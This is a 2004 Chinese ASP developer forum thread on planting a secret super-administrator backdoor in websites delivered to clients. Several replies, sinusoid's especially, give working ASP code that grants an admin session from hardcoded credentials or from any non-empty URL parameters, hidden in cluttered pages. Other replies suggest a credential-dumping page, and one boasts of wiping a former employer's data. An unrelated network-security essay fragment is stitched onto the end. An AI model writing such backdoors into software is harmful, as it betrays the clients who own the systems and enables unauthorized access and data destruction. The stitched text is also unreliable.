如何在做好的网站上设立一个后门,只有自己知道的后门?

fuqing11 2004-07-24 05:22:23
就是在后台管理上,加一个超级管理员的权限,这个用户名不在管理员表里出现,总之,别人轻易发觉不了这个用户的存在。
...全文
890 47 打赏 收藏 转发到动态 举报
写回复
用AI写文章
47 条回复
切换为时间正序
请发表友善的回复…
发表回复
iuhxq 2004-07-27
  • 打赏
  • 举报
回复
sinusoid(黑眼圈)兄的办法不错,就是if request("user")="admin" and md5(request("pass"))="7a57a5a743894a0e" then太扎眼


直接
if request("user")<>"" and request("pass")<>"" then
session("login")="admin"
end if
我觉得比较隐蔽


另外说道德问题:我觉得留后门和道德没关,因为"害人之心不可有,防人之心不可无嘛",万一做完活,不给报酬咋办?你和他打官司呀?

所以你可以先留后门,收到报酬后再给他一个补丁(呵呵,就是修复后门的)
-神仙- 2004-07-27
  • 打赏
  • 举报
回复
不过很多客户连默认的管理员密码都不改的,大半年后找我们维护的时候密码还是老样子。(交货的时候当然告诉他的)。
ycted 2004-07-27
  • 打赏
  • 举报
回复
做个特殊的页面然后可以向数据库的任何表里 读,写,改.
很好做的,数据库每个地段都有自己的类型,你知道表名(即使你不知道也可以得到),
然后循环得到数据库的值,这样你就可以查看.总的来说 这个文件你一定要传到服务器上去就对拉.
wangflove 2004-07-27
  • 打赏
  • 举报
回复
听眼圈兄一说,果然有道理,我也该考虑一下后门的另一用途了。:D
AngelYe 2004-07-26
  • 打赏
  • 举报
回复
http://community.csdn.net/Expert/topic/3208/3208935.xml?temp=.1887628
AngelYe 2004-07-26
  • 打赏
  • 举报
回复
另建一个专用数据表 用程序检测一下是否是专用表格中的用户,如果不是,再在用户表中找吧! 还要屏蔽掉你的名字,使别人不能注册~,给出消息 已注册 等等~
darker 2004-07-26
  • 打赏
  • 举报
回复
有个页面可以显示所有后台管理的帐号和密码~但是不经过任何验证的~
mcu163 2004-07-26
  • 打赏
  • 举报
回复
各位写段程序来看看嘛!!!!
xzyan80 2004-07-26
  • 打赏
  • 举报
回复
up
jxy004 2004-07-26
  • 打赏
  • 举报
回复
2楼说的最直接!这个最可行!!!
yangdengfeng2003 2004-07-26
  • 打赏
  • 举报
回复
在程序里面默认一个用户id为超级管理员,这个默认id只有你知道!
Equn 2004-07-26
  • 打赏
  • 举报
回复
根据登录判断变量,做一个自动登录页面

sinusoid 2004-07-26
  • 打赏
  • 举报
回复
留后门:
一:
写个函数(功能:不通过数据库比较,直接用固定的用户名+MD5(密码)进入)
例:
'func1.asp
<!--#include file="md5.asp"-->
sub superlogin()
if request("user")="admin" and md5(request("pass"))="7a57a5a743894a0e" then
'密码也用md5加密,示例为admin
session("login")="admin" '假设你的系统,如果管理员登录是这样赋值的。
'成为管理的多个条件在此添加。
end if
end sub

二:
'任意页面中(最好感觉代码即乱又多的那种),设:xxx.asp
'可以在某处插入下面的代码
'当URL的参数的user及pass不为空时,下面的代码才被激活
'也就是平常,你不传递给上面两个参数传递值。下面的代码是不工作的。
<!--#include file="func1.asp"-->
<%
if request("user")<>"" and request("pass")<>"" then
superlogin
end if
%>

三:
'向url传递参数,激活代码
'访问xxx.asp时,用http://www.xxx.com/xxx.asp?user=admin&admin=admin
'接着在本页输入后台管理的页面,例:http//www.xxx.com/admin.asp。。。
sinusoid 2004-07-26
  • 打赏
  • 举报
回复
赞成留后门!!

为自己留一手,免得白给人家干活。我一般都有留。程序员永远只是弱势的一方。

几个月前,我给人做一个报价系统,那老板人贱,说试用一个星期(没钱),我一个星期没命地干活,等系统完成时,就是我被炒的时候(说目前没活做,以后录用优先考虑你,KAO!)我性子不好,二话不说,走人,系统他在用,当时很气,也忘记删除。
让他用了几个月之后,我叫一家网吧的朋友,把里头的数据全清了,嘿嘿!他没道德先,不要怪我不义!
潜水的鱼 2004-07-26
  • 打赏
  • 举报
回复
不大赞成星星们的观点,这个世界永远是:

“胜者为王,败者为寇”

“职业道德”是相对而言,如果客户(私活)没有“职业道德”,那咋办??
xinsheng212 2004-07-26
  • 打赏
  • 举报
回复
我有个好办法:dreamweaver不是有个behaviors么,然后你在主页某个隐蔽的位置,添加一个高10,宽2的透明图片,然后再图片上加动作,当鼠标按住左健在那个图片上滑动的时候,就会弹出一个窗口,窗口让你输入用户名密码。。下面的不用说了。

我曾经用过的。
wangflove 2004-07-26
  • 打赏
  • 举报
回复
同意二楼的做法.
其实,有时候留后门也是不得已,只不过是在希望知道网站出现状况时,能在客户不知情的情况下先解决问题.我从来不搞破坏的,我鄙视搞破坏的程序员!
retrying 2004-07-26
  • 打赏
  • 举报
回复
如果,你的付出,还没给你报酬,你可以做,但人家如果给你报酬了,你就不应该做,应该撒掉。
mind_1220 2004-07-26
  • 打赏
  • 举报
回复
自我保护 不应该用这样的方法!
技术才是一个程序员最大的武器
ghy412 2004-07-26
  • 打赏
  • 举报
回复
有的时候这个也是一种自我保护!
不过我是新手我还不会:)


加载更多回复(27)
以计算机网络安全为题的论文全文共6页,当前为第1页。以计算机网络安全为题的论文全文共6页,当前为第1页。以计算机网络安全为题的论文 以计算机网络安全为题的论文全文共6页,当前为第1页。 以计算机网络安全为题的论文全文共6页,当前为第1页。 篇一 《关于计算机网络安全的思考》 摘要:本文阐述了网络安全的概念,分析了网络安全存在的问题,提出了采取的防范技术。 关键词:计算机;网络安全;思考 1 网络安全的概念 网络安全就是要保护网络用户的信息安全及利益 ,给用户提供一个可信赖的网络环境,网络安全主要包括网络系统中的硬件、软件和在网络上传输的各种信息的安全,使这些内容不要遭受偶然的、有意的或者无意的恶意的攻击,同时要求网络的运行能够给用户提供一个服务质量保证,比如,用户正在利用网络传输数据,突然数据传输服务终止了,导致数据的不完整性。网络的安全问题是一个综合性的问题,它既有技术方面的问题,同时也有网络管理方面的问题,只有各方面都做好了,才能有一个安全的网络环境。 2 网络安全存在的问题 网络安全存在的问题是多方面的,下面就对主要的方面加以分析: 2.1 计算机操作系统的安全问题 大家都知道,操作系统是计算机的最基本的系统软件,其他的应用软件都是在操作系统上运行的,所以,如果我们使用的电脑的操作系统出现各种安全隐患,如操作系统本身的漏洞、操作系统中了木马等病毒时,网络入侵者就能够利用这些漏洞获取本机的一些信息,如用户名和密码等,然后登录进入本机系统,对本机进行非法操作,破坏用户的数据。如果入侵者非法登录的是一台提供某种网络服务的服务器的话,后果就更加严重了,入侵者致使服务器瘫痪,让服务器停止服务,盗取服务器上的有用数据等。 2.2 应用系统和软件的安全问题 如果计算机在网络上传输数据时要安装或加载相应的程序,而安装或加载的程序有漏洞和后门程序的话,在通信时,网络入侵者就会利用这些漏洞或后门非法侵入,窃取数据,产生威胁,如我们在Windows系统中使用的IE浏览器和WEB服务器就会出现这种问题,导致上网的过程中计算机就会遭受攻击而出现问题。事实上,每个操作系统或网络软件都不是十全十美的,因此,我们使用的网络环境总是有安全威胁的存在,一不小心就会遭受攻击。 2.3 数据库管理系统的安全问题 以计算机网络安全为题的论文全文共6页,当前为第2页。以计算机网络安全为题的论文全文共6页,当前为第2页。 数据库管理系统和应用软件操作系统一样也不 十全十美的,系统本身也会存在漏洞,而我们网络上的好多服务都是基于数据库的,数据库管理系统管理的对象就是数据库,因此,入侵者可以利用数据库管理系统的漏洞窃取用户的账户和密码,盗取用户的数据,对用户产生威胁。 以计算机网络安全为题的论文全文共6页,当前为第2页。 以计算机网络安全为题的论文全文共6页,当前为第2页。 2.4 服务器信息泄露的安全问题 服务器在计算机网络中有重要的角色,而这些服务器在安装配置过程中有许多重要的信息,如登录服务器的账号和密码,服务器程序运行时进程的端口号,服务程序本身的漏洞信息等,这些信息对服务器的安全运行非常重要,如果这些信息被泄露,将会对服务器的正常安全运行产生很大的影响。 2.5 安全配置不当造成的安全问题 安全配置不当有两方面的内容,一方面是网络连接互联设备的配置不当产生的安全问题,如路由器、防火墙、交换机等配置不当造成的不安全问题,路由器和交换机配置不当就会影响用户上网,甚至无法上网,而防火墙配置不当就会使防火墙的安全策略失效,就达不到安全保护的作用。另一方面是系统软件和各种应用软件的配置不当产生的不安全问题,如服务器上操作系统设置不当就会存在操作系统漏洞,应用软件如果配置不当就会产生网络服务无法提供,或者不能保证服务质量,甚至留下漏洞,让入侵者有机可乘。 2.6 病毒、后门和木马程序存在的安全问题 病毒是危机数据安全的主要因素,它是程序设计者编制的破坏计算机系统的程序。计算机病毒通常有破坏性、传播性、隐蔽性等的特征。在网络环境中,病毒的危害性更加严重,它能在网络中快速传播,大面积的破坏数据,甚至会造成网络瘫痪,严重影响网络的正常运行;后门就是指硬件或者软件的制造者在编制程序的过程当中故意留下的漏洞,如访问口令等,便于日后利用这些后门信息非法入侵,对系统产生威胁;而木马也是一类特殊的程序,和后门程序相似,它具有隐蔽性和非授权等的特点,如果系统有木马程序存在,那么入侵者就会利用木马程序入侵电脑,进行破坏数据。 3 采取的防范技术 3.1 采用网络防火墙技术 为了保护数据和资源的安全,人们创建了防火墙。防火墙分为两类,一类是硬件防火墙,这类防火墙又叫网络防火墙,它是企业内部网和外部网之间所设立的执行访问控制策略的安全系统,它在内部和外网之间设置控制,以阻止外界对内部资源的非法访

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧